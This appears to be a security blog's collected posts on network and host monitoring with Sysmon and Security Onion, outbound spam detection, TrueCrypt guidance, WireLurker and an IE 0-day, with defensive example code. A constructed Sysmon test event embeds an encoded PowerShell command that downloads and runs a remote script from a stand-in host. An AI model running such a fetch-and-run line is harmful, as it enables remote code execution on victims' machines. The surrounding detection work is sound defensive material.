Sysmon & Security Onion, Part 1: Rise of the Encrypted Web

This is part one of a series of posts that contain key excerpts of my paper, Using Sysmon to Enrich Security Onion’s Host-Level Capabilities.

In the eleven years since Richard Bejtlich wrote his seminal book on Network Security Monitoring, practitioners have run into several issues that expose the limits of network-centric monitoring. The rise of encrypted-by-default web traffic, which blinds defenders to most NSM data types, is one of them.

NSM data is typically collected through a TAP or SPAN port at a strategic chokepoint in the network. If the data between client and server is encrypted, several NSM data types become useless to the analyst: full content, extracted content, and certain types of alerts. With the revelations of the past few years that a number of governments around the world have been intercepting their citizens’ unencrypted communications, there has been significant interest in encrypting most, if not all, of the web traffic around the world. In 2014, CloudFlare, which hosts a content delivery network (CDN) and security services for two million websites, enabled free SSL for all of its customers. They stated, “Having cutting-edge encryption may not seem important to a small blog, but it is critical to advancing the encrypted-by-default future of the Internet. Every byte, however seemingly mundane, that flows encrypted across the Internet makes it more difficult for those who wish to intercept, throttle, or censor the web.” (Prince, 2014)

A recent study, The Cost of the “S” in HTTPS, found that among twenty-five thousand residential ADSL customers, HTTPS accounted for 80% of upload traffic, up from 45.7% in 2012. (Naylor, et al.) This trend is expected to continue for the foreseeable future.

This increase in encryption will mostly be seen in north-south traffic, not necessarily east-west traffic, so NSM sensors deployed to monitor internal traffic may not be as readily affected. Sensors deployed at network egress points, however, will certainly be affected unless some type of mitigation is put in place. The usual mitigation is to proxy (terminate and re-encrypt) the SSL traffic so that the sensor can read the plaintext, though this is limited in practice by performance, privacy, and liability concerns.
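To make the blind spot concrete, here is an added example (my own illustration, not code from the paper or from Security Onion): a minimal parser for the one part of a TLS session that a passive TAP/SPAN sensor can still read, the ClientHello. Everything after the handshake is ciphertext, so full content and extracted content are gone, but the offered protocol version, the cipher suites and the SNI hostname are still there for session-level logging and alerting. The ClientHello bytes are constructed by the build function below, not captured traffic, and the parser refuses malformed or truncated records instead of guessing.

```python
import struct

TLS_HANDSHAKE = 0x16      # TLS record content type: handshake
CLIENT_HELLO = 0x01       # handshake message type: ClientHello
EXT_SERVER_NAME = 0x0000  # server_name (SNI) extension


def build_client_hello(hostname, cipher_suites=(0xC02F, 0xC030, 0x009C)):
    """Build a minimal TLS 1.2 ClientHello record. This is constructed sample
    traffic, not a capture; the random is fixed (real clients use a CSPRNG)."""
    body = struct.pack(">H", 0x0303)                # client_version
    body += b"\x11" * 32                            # random
    body += b"\x00"                                 # session_id length = 0
    suites = b"".join(struct.pack(">H", s) for s in cipher_suites)
    body += struct.pack(">H", len(suites)) + suites
    body += b"\x01\x00"                             # one compression method: null
    extensions = b""
    if hostname is not None:
        name = hostname.encode("ascii")
        entry = b"\x00" + struct.pack(">H", len(name)) + name   # name_type=host_name
        sni = struct.pack(">H", len(entry)) + entry             # ServerNameList
        extensions += struct.pack(">HH", EXT_SERVER_NAME, len(sni)) + sni
    body += struct.pack(">H", len(extensions)) + extensions
    handshake = bytes([CLIENT_HELLO]) + len(body).to_bytes(3, "big") + body
    return bytes([TLS_HANDSHAKE]) + struct.pack(">HH", 0x0301, len(handshake)) + handshake


def parse_client_hello(record):
    """Return the metadata a passive sensor can still read from a ClientHello
    (version, offered cipher suites, SNI), or None if the record is not a
    well-formed ClientHello. Everything after the handshake is opaque."""
    try:
        if record[0] != TLS_HANDSHAKE:
            return None
        rec_len = struct.unpack(">H", record[3:5])[0]
        hs = record[5:5 + rec_len]
        if hs[0] != CLIENT_HELLO:
            return None
        hs_len = int.from_bytes(hs[1:4], "big")
        body = hs[4:4 + hs_len]
        if len(body) != hs_len:
            return None                             # truncated: refuse to guess
        pos = 0
        version = struct.unpack(">H", body[pos:pos + 2])[0]
        pos += 2 + 32                               # skip client_version and random
        pos += 1 + body[pos]                        # skip session_id
        cs_len = struct.unpack(">H", body[pos:pos + 2])[0]
        pos += 2
        suites = [struct.unpack(">H", body[i:i + 2])[0]
                  for i in range(pos, pos + cs_len, 2)]
        pos += cs_len
        pos += 1 + body[pos]                        # skip compression methods
        sni = None
        ext_len = struct.unpack(">H", body[pos:pos + 2])[0]
        pos += 2
        end = pos + ext_len
        while pos + 4 <= end:
            etype, elen = struct.unpack(">HH", body[pos:pos + 4])
            pos += 4
            edata = body[pos:pos + elen]
            pos += elen
            if etype == EXT_SERVER_NAME and len(edata) >= 5:
                # edata: list length (2), name_type (1), name length (2), name
                name_len = struct.unpack(">H", edata[3:5])[0]
                sni = edata[5:5 + name_len].decode("ascii", "replace")
        return {"version": version, "cipher_suites": suites, "sni": sni}
    except (IndexError, struct.error):
        return None                                 # malformed input must not crash the sensor


if __name__ == "__main__":
    print(parse_client_hello(build_client_hello("www.example.com")))
```

The same record types carry the server certificate in the ServerHello flight, which is why certificate logging still works on an encrypted link even though the HTTP request and response never will. Note that a client talking to a proxy or using a session ticket may omit the SNI extension, so a sensor should log a missing hostname rather than treat it as an error.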


Prince, M. (2014, September 29). Introducing Universal SSL. Retrieved February 12, 2015, from

Naylor, D., Finamore, A., Leontiadis, I., Grunenberger, Y., Mellia, M., Munafò, M., . . . Steenkiste, P. (n.d.). The Cost of the “S” in HTTPS. Retrieved February 12, 2015, from


Using Sysmon To Enrich Security Onion’s Host-Level Capabilities

SANS recently accepted my GCFA Gold paper, Using Sysmon To Enrich Security Onion’s Host-Level Capabilities. The abstract is as follows:

With more network traffic being encrypted, as well as the persistence of advanced adversaries, it is becoming increasingly imperative that there is greater visibility at the host-level. With this greater visibility comes the ability to more efficiently detect and respond to threats. This paper highlights the use of Sysmon to enrich existing Windows host visibility capabilities in Security Onion, as well as how to use this increased visibility in detection and incident response. In this paper, the author has developed custom parsers and rulesets for integrating host-based data into Security Onion, something which to date had not yet been done for this project.

You can find the paper here. [pdf]

You can also find the ELSA Parsers, as well as the OSSEC decoder and rulesets that I wrote, on Github.
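As an added illustration of what integrating host data involves (my own example, not the ELSA parsers or OSSEC rules from the paper), the block below parses a constructed Sysmon Event ID 1 (process creation) record in the XML form Windows writes to the event log, flattens the EventData fields into a dictionary, and runs two illustrative rules over it: an Office application spawning a script interpreter, and PowerShell launched with an encoded command, which it also decodes for the analyst. Host name, user name, paths, the hash value and the download URL are all constructed.

```python
import base64
import os
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed payload for the -enc argument: PowerShell expects base64 of UTF-16LE.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
    .encode("utf-16-le")).decode("ascii")

# Constructed Sysmon Event ID 1 (process creation) as the event log renders it in XML.
SUSPICIOUS_EVENT = rf"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>1</EventID><Computer>WS01.corp.example</Computer></System>
  <EventData>
    <Data Name="UtcTime">2015-02-12 14:03:21.123</Data>
    <Data Name="ProcessId">4120</Data>
    <Data Name="Image">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
    <Data Name="CommandLine">powershell.exe -nop -w hidden -enc {ENCODED}</Data>
    <Data Name="User">CORP\alice</Data>
    <Data Name="Hashes">SHA1=DA39A3EE5E6B4B0D3255BFEF95601890AFD80709</Data>
    <Data Name="ParentImage">C:\Program Files\Microsoft Office\Office15\WINWORD.EXE</Data>
    <Data Name="ParentCommandLine">"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" /n invoice.docx</Data>
  </EventData>
</Event>"""

# Constructed benign event: the user opens a text file from Explorer.
BENIGN_EVENT = r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>1</EventID><Computer>WS01.corp.example</Computer></System>
  <EventData>
    <Data Name="Image">C:\Windows\System32\notepad.exe</Data>
    <Data Name="CommandLine">notepad.exe notes.txt</Data>
    <Data Name="User">CORP\alice</Data>
    <Data Name="ParentImage">C:\Windows\explorer.exe</Data>
  </EventData>
</Event>"""


def parse_sysmon_event(xml_text):
    """Flatten a Sysmon event into a dict: a few System fields plus every
    EventData/Data element keyed by its Name attribute."""
    root = ET.fromstring(xml_text)
    event = {
        "event_id": int(root.findtext("e:System/e:EventID", namespaces=NS)),
        "computer": root.findtext("e:System/e:Computer", namespaces=NS),
    }
    for data in root.findall("e:EventData/e:Data", NS):
        event[data.get("Name")] = data.text or ""
    return event


def _basename(path):
    """Lower-cased file name of a Windows path ("C:\\x\\y.EXE" -> "y.exe")."""
    return os.path.basename(path.replace("\\", "/")).lower()


def decode_encoded_command(cmdline):
    """Recover the script behind -e/-ec/-enc/-encodedcommand, or None if there
    is no such argument or it does not decode as base64(UTF-16LE)."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ("-e", "-ec", "-enc", "-encodedcommand"):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def evaluate(event):
    """Illustrative rules over one parsed process-creation event. Returns
    (rule_name, level) pairs; levels follow the OSSEC 0-15 convention."""
    alerts = []
    if event.get("event_id") != 1:
        return alerts
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    if parent in OFFICE_APPS and image in INTERPRETERS:
        alerts.append(("office_app_spawned_interpreter", 10))
    if image == "powershell.exe" and decode_encoded_command(event.get("CommandLine", "")) is not None:
        alerts.append(("powershell_encoded_command", 8))
    return alerts


if __name__ == "__main__":
    ev = parse_sysmon_event(SUSPICIOUS_EVENT)
    print(evaluate(ev), decode_encoded_command(ev["CommandLine"]))
```

Matching on the parent/child pair rather than on the command line alone is what keeps the first rule useful: the encoded string changes with every campaign, but Word launching PowerShell does not. The decoded script is worth storing alongside the alert, since the base64 form defeats any keyword search an analyst would otherwise run in ELSA.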

In the next month, I will be breaking up some key parts of the paper into a number of blog posts.



A No-Nonsense Guide to the OpenBSD Firewall

Though this is the 3rd edition, this is the first time I have picked up this book. As a proponent of the *BSDs, I appreciate having good-quality material like this book available, both to get an overview and then to get down into the mechanics of key subsystems like PF.

I appreciated the clear, concise writing, as well as the multitude of real world examples.

One of the key chapters for me was Chapter 6: Turning the Tables for Proactive Defense. Peter goes in depth into how PF elegantly handles problems like SSH brute-forcing, and how it deals with spam through stuttering, blacklisting and greylisting.

Highly recommended for anyone interested in working with PF, or already administering PF but looking for some extra help in certain areas.




Yesterday Palo Alto Networks released a report on a new OSX & iOS malware, WireLurker.  The best write-up I have seen so far is here:

A couple pertinent points:

-Currently circulated only through Chinese warez; it seems to be targeting users’ identifying information only (possibly to identify key players in the Chinese software-pirating market?)

-The concern is not so much about WireLurker itself, but “…that this technique could be weaponized in the future, and be a viable means of attack on public and private sector machines.”

-If you are interested in detecting whether a device has been compromised, see here: – If anybody has IDS signatures yet, please let me know….


Key Takeaways:

-Remind users that jailbreaking a phone (whether Android or iPhone) leaves them with less security; better yet, enforce policies that disallow jailbroken devices from holding organizational data

-“While your own Mac may not be infected with WireLurker, it’s possible others (in your school, college, at work, or public computers) are, so it’s important not to trust any devices other than your own. To help prevent this from accidentally happening, you may wish to pair lock your device using these instructions.”

We need to continue to help foster a cultural change around most of our Mac users: the fallacy that if you have a Mac, you don’t need to worry about security issues… “Only PC users need to worry about that.”


Liability Insurance & Digital Security Claims

This is part of our blog series on the continuous dialogue you should be having with your executive leadership, to make them aware of issues on which they should be making organizational decisions:

“There is ongoing litigation in which most insurance carriers are pushing back against their clients when it comes to “cyber” security-related claims under an organization’s general liability insurance. Most recently, the insurance carrier for P.F. Chang’s has taken legal action to contest P.F. Chang’s claim that its commercial general liability policy covers defense costs and provides indemnity coverage for its recent credit card breach.

Leadership needs to understand that our general liability coverage will most likely not cover a digital security event, even if the coverage wording is vague (the carrier will most likely still fight it, to avoid a precedent-setting case). If we want coverage for digital security incidents, we need to pursue a separate policy or rider specifically for it.”

For more information, continue to the following link.



Prevention Eventually Fails….

Organizational leadership needs to understand that no matter what technical and procedural protections are put in place, prevention eventually fails, especially (but not exclusively) against a targeted attack orchestrated by a motivated adversary. This means the organization must plan for this eventual “failure”: it must be able to detect and respond to it.

When this failure occurs, the question leadership must ask is not “Why did our defenses fail?” but “How long did it take us to detect and respond to this failure?” According to industry sources, the mean time to detection of advanced attackers is around 8 months. This means that the average organization does not know it has been severely compromised for 8 months, which is typically more than enough time for the adversary to achieve their goals.

With all that in mind, what is your detection strategy?



Outbound Spam Filtering

One configuration gap that I have run into a number of times is the lack of outbound spam/anti-virus filtering. The organization in question has its inbound mail running through its anti-spam/AV filter, but not its outbound mail. When asked about it, the typical response has been, “Never thought about it. We are really only concerned about inbound spam and viruses.”

Here is my typical response:

When a corporate mailbox is compromised and used in a spam campaign, how will you know? When the user of the compromised account complains to the helpdesk about the glut of bounced messages in their inbox? By that time, possibly your only static public IP has been listed on a number of Real-time Blackhole Lists (RBLs).

Filtering outbound messages for spam/malware helps you detect compromised internal accounts and computers faster than waiting for the user or an RBL to alert you. Just be sure to tune the alerting so that you get the right alerts when they are needed and don’t fall into alert fatigue.
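An added example of the second half of that point, tuning the alerts so that a hijacked mailbox produces one ticket rather than hundreds (illustrative code of my own, not taken from any filtering product; the log format, addresses and timestamps are constructed for the example): it reads outbound-filter verdicts, keeps a sliding window of spam verdicts per internal sender, and raises one alert per sender per window once the count crosses a threshold. A single spam verdict from a user who forwarded a chain letter stays below the threshold; a burst from a compromised account does not.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed outbound-filter log lines (not a real product's format): one line per
# message that left the organisation through the filter, with the filter's verdict.
SAMPLE_LOG = [
    "2015-02-12T08:00:10 outbound from=bob@corp.example to=vendor@example.net verdict=CLEAN score=0.4",
    "2015-02-12T08:01:02 outbound from=alice@corp.example to=x1@example.org verdict=SPAM score=11.2",
    "2015-02-12T08:02:15 outbound from=alice@corp.example to=x2@example.org verdict=SPAM score=12.9",
    "2015-02-12T08:02:40 outbound from=carol@corp.example to=friend@example.com verdict=SPAM score=6.1",
    "2015-02-12T08:03:30 outbound from=alice@corp.example to=x3@example.org verdict=SPAM score=10.7",
    "2015-02-12T08:04:05 outbound from=alice@corp.example to=x4@example.org verdict=SPAM score=13.0",
    "this line is garbage and must be skipped rather than crash the detector",
    "2015-02-12T09:30:00 outbound from=carol@corp.example to=list@example.com verdict=SPAM score=5.5",
]

LINE_RE = re.compile(
    r"^(?P<ts>\S+) outbound from=(?P<sender>\S+) to=(?P<rcpt>\S+) "
    r"verdict=(?P<verdict>\S+) score=(?P<score>[0-9.]+)$")


def parse_line(line):
    """Parse one filter log line; return None for anything that does not match."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%S")
    rec["score"] = float(rec["score"])
    return rec


def find_compromised_senders(lines, threshold=3, window=timedelta(minutes=10)):
    """Alert on an internal sender whose outbound mail is flagged as spam
    `threshold` times within `window`. One alert per sender per window, so a
    burst of 500 spam messages from one hijacked mailbox yields one ticket."""
    recent = defaultdict(deque)   # sender -> timestamps of recent SPAM verdicts
    muted_until = {}              # sender -> time until which we stay quiet
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["verdict"] != "SPAM":
            continue
        sender, ts = rec["sender"], rec["ts"]
        q = recent[sender]
        q.append(ts)
        while q and ts - q[0] > window:    # drop verdicts older than the window
            q.popleft()
        if len(q) >= threshold and muted_until.get(sender, datetime.min) <= ts:
            alerts.append({"sender": sender, "first_seen": q[0].isoformat(),
                           "alert_at": ts.isoformat(), "count": len(q)})
            muted_until[sender] = ts + window
    return alerts


if __name__ == "__main__":
    for alert in find_compromised_senders(SAMPLE_LOG):
        print(alert)
```

The window and threshold are the two knobs to tune against your own baseline: a marketing account that legitimately sends bulk mail will need a higher threshold or an allow-list, while a helpdesk that reviews tickets once an hour gains nothing from a window shorter than that.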





Governance Challenges: The Digital Side of Duty of Care

I have just finished a short paper on Duty of Care and how some aspects of it apply to the digital world. For instance, consider the following:

A staff member is traveling to a region of the world that is currently embroiled in factional warfare, and there is a higher than average risk of kidnappings. The staff member wants to share about her trip with her online following, and posts to her social media accounts a photo of her (detailed) itinerary for the ten day trip.

A staff member is traveling internationally and stops by an Internet cafe to catch up on business and personal correspondence. Unbeknownst to her, she has exposed herself to a high risk of identity theft because the Internet cafe computers were compromised with keyloggers and other malware.

If the staff member’s organization did not provide sufficient training to help her understand the risks of social media while traveling and of basic computing security, it has opened itself up to a duty-of-care negligence case.

You can read more about these issues in the paper, found here. [pdf]

Please feel free to contact me with any questions or comments that you may have.



New CS-RC Report – TrueCrypt, June 2014

The Polder Consortium Computer Security Response Community (CompSec RC) has published a report that provides analysis of the situation and guidance for IT decision makers.

The IT Security community was bewildered by the May 28, 2014 announcement on the TrueCrypt website declaring “WARNING: Using TrueCrypt is not secure as it may contain unfixed security issues”. The website furthermore directs users to migrate data from disks, volumes and containers previously encrypted with TrueCrypt to “encrypted disks or virtual disk images supported on your platform”.

The situation is made much more difficult by the fact that the TrueCrypt developers have maintained their anonymity over the ten-year life cycle of the product. There have been no interviews with the developers, and as a result a lot of conjecture has arisen about the mysterious manner in which they terminated the project.

Based on our analysis of this situation we are recommending the following action steps:

  1. It is considered safe (with caveats) to continue using the latest working version (7.1a) but only for the short-term, i.e., the next 6 months. Please do not take this as an endorsement that users should continue using TrueCrypt!
  2. TrueCrypt is no longer a viable option for long-term strategic initiatives. We highly recommend organizations develop a migration plan for transitioning away from TrueCrypt. We may have more specific recommendations at a later date but for guidance see the full report.
  3. We further recommend that users no longer download TrueCrypt or install it on client machines. In particular, we recommend against downloading the latest TrueCrypt version 7.2, because there is some (unverified) risk that the TrueCrypt 7.2 install files are compromised. Individuals who have TrueCrypt-encrypted volumes but do not have TrueCrypt already installed should download version 7.1a from GRC’s TrueCrypt Final Release Repository for the purpose of accessing those files and migrating them to a secure encryption platform.

See the full report here CS-RC Report – TrueCrypt, June 2014.

As a side note, I was the lead contributor for this report.



IE6 – IE11 0 Day Vulnerability [April/May 2014]


As some of you have no doubt seen, there is a new 0-day vulnerability in IE6 through IE11 that allows an attacker to bypass two of Windows’ primary exploit mitigations, ASLR and DEP. Specifically, the way IE (mis)handles Adobe Flash content is what makes this possible. There is currently no patch from Microsoft, but I do expect one within the next couple of days.

The initial exploitation of this vulnerability targeted IE9 through IE11 and a specific set of users that an APT group was after, but we are now seeing more generalized, non-targeted attacks.

There are a few reasons this is a significant vulnerability, beyond the fact that it is a 0-day:

-Under Microsoft’s end-of-life policy, this vulnerability will not be patched on Windows XP. This means that no matter which version of IE you are running on XP (IE6 through IE8), it will remain vulnerable to this exploit unless extra action is taken (see the mitigation options below).

-This vulnerability affects a very wide set of IE versions: in 2013, these versions of IE made up 53% of the desktop browser market share. [src]

General Mitigation Options:

The following are the main ways to mitigate this exploit:

Disable/Remove Adobe Flash: Because this exploit depends on the interaction between Flash and IE, disabling or removing Flash mitigates it.

Enable IE’s “Enhanced Protected Mode”: EPM was introduced in IE10 as an enhancement to the “Protected Mode” of earlier IE versions. EPM can cause unintended compatibility issues with other applications and web apps, so make sure to test before rolling it out.

Use the Enhanced Mitigation Experience Toolkit: [SRC] I have discussed EMET quite a bit in the last year, but if you are not aware of what it is, Brian Krebs has a good primer on it. [SRC]

Use a different browser: Because this is a vulnerability in IE’s handling of corrupted Flash files, switching to a different browser mitigates the issue. Keep in mind that other installed applications (Microsoft Office, etc.) may use the IE engine to render HTML and Flash content, which would bring that computer back into the scope of this vulnerability.


